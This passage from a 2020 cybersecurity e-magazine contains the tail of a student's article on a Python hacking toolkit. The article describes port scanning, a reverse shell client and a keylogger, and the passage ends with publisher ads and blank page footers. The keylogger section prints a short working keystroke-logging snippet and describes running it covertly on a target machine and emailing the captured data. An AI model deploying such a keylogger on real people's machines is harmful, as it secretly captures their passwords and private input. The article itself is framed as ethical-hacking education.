open ports within any network, enabling admins to close or secure unused or time-constrained ports. Hackers, on the other<br />
hand, can use port scanning to identify the open ports through which they can access the network to perform ping attacks or<br />
smurf attacks at the least. Implementation of this mechanism requires the python nmap module that supports various types<br />
of scans.Fig 5 depicts the port scanning process.<br />
Fig 5: Port Scanning demonstration<br />
Reverse Shell<br />
Gaining access to target systems could be a pain, hence, Reverse Shells have been integrated to provide<br />
substantial aid in enumeration and forensic analysis. For this, a client side package is provided, which<br />
when run on the target machine, would in turn activate the reverse shell, establishing connection by<br />
binding sockets over ports. Once the reverse shell is active, users can type in unix commands to access<br />
the data and such on the target machine. It also enables users to download or upload files over ftp<br />
connections.<br />
Keylogger<br />
The keylogger is another great tool which can be used to log keystrokes. Users are provided with a client<br />
package which will run in the background on the target machine and will be able to record keystrokes<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 136<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
with high-precision and also send keylogger data to the user’s email. An example code snippet of the<br />
keylogger is as below:<br />
from pynput.keyboard import Listener<br />
def logger(key):<br />
letter = str(key)<br />
letter = letter.replace("'", "")<br />
if letter == 'Key.space':<br />
letter = ' '<br />
if letter == 'Key.shift_r':<br />
letter = ''<br />
if letter == "Key.ctrl_l":<br />
letter = ""<br />
if letter == "Key.enter":<br />
letter = "\n"<br />
with open("log.txt", 'a') as f:<br />
f.write(letter)<br />
with Listener(on_press=logger) as l:<br />
l.join()<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 137<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Encode/Decode<br />
Any and every pentester or hacker would have, with no doubts, faced encoded data in their several<br />
hacking endeavours. Hence several of the most popular encoding/decoding schemes such as Base64,<br />
URL, Brainfuck, JS Obfuscation, etc have been implemented. Encryption using AES(Advanced<br />
Encryption Standard) is also provided as depicted in Fig 6.<br />
Fig 6: AES Encryption<br />
Auxiliary Features/Mechanisms<br />
The several auxiliary mechanisms intertwined are:<br />
●<br />
●<br />
●<br />
●<br />
●<br />
●<br />
●<br />
Captcha Breaker<br />
Strong Password Generator<br />
File Scanning<br />
Email Sender<br />
Time and Weather<br />
News<br />
AI you can converse with<br />
Conclusion<br />
At present, <strong>Cyber</strong>-crimes have emerged more dangerous than ever before, embodying menacing<br />
hackers from all around the globe. It is therefore, high-time that <strong>Cyber</strong> security is accommodated in the<br />
front seat, enabling us to fight back. The above documented approach of implementation of the security<br />
policies are but a small step in aiding Ethical Hackers. Hopefully, this article succeeded in portraying “a<br />
method” to embrace the countermeasures and security mechanisms.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 138<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
References<br />
“Security in Computing” by Charles P. Pfleeger.<br />
LiveOverflow on youtube or at www.liveoverflow.com<br />
Mininet : Rapid Prototyping for Software Networks<br />
Xavier A Larriva-Novo Mario Vega-Barbas “Evaluation of <strong>Cyber</strong>security Data Set Characteristics for Their<br />
Applicability to Neural Networks Algorithms Detecting <strong>Cyber</strong>security Anomalies” 01 January <strong>2020</strong><br />
About the Author<br />
I am a budding Ethical Hacker with a towering interest in the security<br />
field. I am currently pursuing my Bachelors in Computer Science<br />
and Engineering at Jaya Engineering College in Chennai, India. I<br />
have participated in several CTF competitions and completed<br />
several courses on pentesting. My interest in cyber-security was<br />
piqued by the length and breadth of its applications and the thrill<br />
involved in solving the challenges. Hence, to no one’s surprise, I am<br />
currently working on several vulnhub boxes and overthewire<br />
challenges. Anybody wanting to collaborate can connect on twitter<br />
(@stafordtitus) or linkedIn ( https://www.linkedin.com/in/stafordtitus-643638147/<br />
).<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 139<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 140<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 141<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 142<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 143<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 144<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 145<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 146<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 147<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 148<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 149<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 150<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 151<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 152<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 153<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 154<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Meet Our Publisher: Gary S. Miliefsky, CISSP, fmDHS<br />
“Amazing Keynote”<br />
“Best Speaker on the Hacking Stage”<br />
“Most Entertaining and Engaging”<br />
Gary has been keynoting cyber security events throughout the year. He’s also been a<br />
moderator, a panelist and has numerous upcoming events throughout the year.<br />
If you are looking for a cybersecurity expert who can make the difference from a nice event to<br />
a stellar conference, look no further email marketing@cyberdefensemagazine.com<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 155<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
You asked, and it’s finally here…we’ve launched <strong>Cyber</strong><strong>Defense</strong>.TV<br />
At least a dozen exceptional interviews rolling out each month starting this summer…<br />
Market leaders, innovators, CEO hot seat interviews and much more.<br />
A new division of <strong>Cyber</strong> <strong>Defense</strong> Media Group and sister to <strong>Cyber</strong> <strong>Defense</strong> Magazine.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 156<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Free Monthly <strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> Via Email<br />
Enjoy our monthly electronic editions of our Magazines for FREE.<br />
This magazine is by and for ethical information security professionals with a twist on innovative consumer<br />
products and privacy issues on top of best practices for IT security and Regulatory Compliance. Our<br />
mission is to share cutting edge knowledge, real world stories and independent lab reviews on the best<br />
ideas, products and services in the information technology industry. Our monthly <strong>Cyber</strong> <strong>Defense</strong> e-<br />
Magazines will also keep you up to speed on what’s happening in the cyber-crime and cyber warfare<br />
arena plus we’ll inform you as next generation and innovative technology vendors have news worthy of<br />
sharing with you – so enjoy. You get all of this for FREE, always, for our electronic editions. Click here<br />
to sign up today and within moments, you’ll receive your first email from us with an archive of our<br />
newsletters along with this month’s newsletter.<br />
By signing up, you’ll always be in the loop with CDM.<br />
Copyright (C) <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine, a division of CYBER DEFENSE MEDIA GROUP (STEVEN G.<br />
SAMUELS LLC. d/b/a) 276 Fifth Avenue, Suite 704, New York, NY 10001, Toll Free (USA): 1-833-844-9468 d/b/a<br />
<strong>Cyber</strong><strong>Defense</strong>Awards.com, <strong>Cyber</strong><strong>Defense</strong>Magazine.com, <strong>Cyber</strong><strong>Defense</strong>Newswire.com,<br />
<strong>Cyber</strong><strong>Defense</strong>Professionals.com, <strong>Cyber</strong><strong>Defense</strong>Radio.com and <strong>Cyber</strong><strong>Defense</strong>TV.com, is a Limited Liability<br />
Corporation (LLC) originally incorporated in the United States of America. Our Tax ID (EIN) is: 45-4188465,<br />
<strong>Cyber</strong> <strong>Defense</strong> Magazine® is a registered trademark of <strong>Cyber</strong> <strong>Defense</strong> Media Group. EIN: 454-18-8465, DUNS#<br />
078358935. All rights reserved worldwide. marketing@cyberdefensemagazine.com<br />
All rights reserved worldwide. Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved. No part of this<br />
newsletter may be used or reproduced by any means, graphic, electronic, or mechanical, including photocopying,<br />
recording, taping or by any information storage retrieval system without the written permission of the publisher<br />
except in the case of brief quotations embodied in critical articles and reviews. Because of the dynamic nature of<br />
the Internet, any Web addresses or links contained in this newsletter may have changed since publication and may<br />
no longer be valid. The views expressed in this work are solely those of the author and do not necessarily reflect<br />
the views of the publisher, and the publisher hereby disclaims any responsibility for them. Send us great content<br />
and we’ll post it in the magazine for free, subject to editorial approval and layout. Email us at<br />
marketing@cyberdefensemagazine.com<br />
<strong>Cyber</strong> <strong>Defense</strong> Magazine<br />
276 Fifth Avenue, Suite 704, New York, NY 1000<br />
EIN: 454-18-8465, DUNS# 078358935.<br />
All rights reserved worldwide.<br />
marketing@cyberdefensemagazine.com<br />
www.cyberdefensemagazine.com<br />
NEW YORK (US HQ), LONDON (UK/EU), HONG KONG (ASIA)<br />
<strong>Cyber</strong> <strong>Defense</strong> Magazine - <strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> rev. date: 07/01/<strong>2020</strong><br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 157<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
TRILLIONS ARE AT STAKE<br />
No 1 INTERNATIONAL BESTSELLER IN FOUR CATEGORIES<br />
Released:<br />
https://www.amazon.com/Cryptoconomy-Bitcoins-Blockchains-Bad-Guys-ebook/dp/B07KPNS9NH<br />
In Development:<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 158<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 159<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
8 Years in The Making…<br />
Thank You to our Loyal Subscribers!<br />
We've Completely Rebuilt <strong>Cyber</strong><strong>Defense</strong>Magazine.com - Please Let Us Know<br />
What You Think. It's mobile and tablet friendly and superfast. We hope you<br />
like it. In addition, we're shooting for 7x24x365 uptime as we continue to<br />
scale with improved Web App Firewalls, Content Deliver Networks (CDNs)<br />
around the Globe, Faster and More Secure DNS<br />
and <strong>Cyber</strong><strong>Defense</strong>MagazineBackup.com up and running as an array of live<br />
mirror sites.<br />
Millions of monthly readers and new platforms coming…<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 160<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 161<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 162<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 163<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 164<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 165<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 166<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.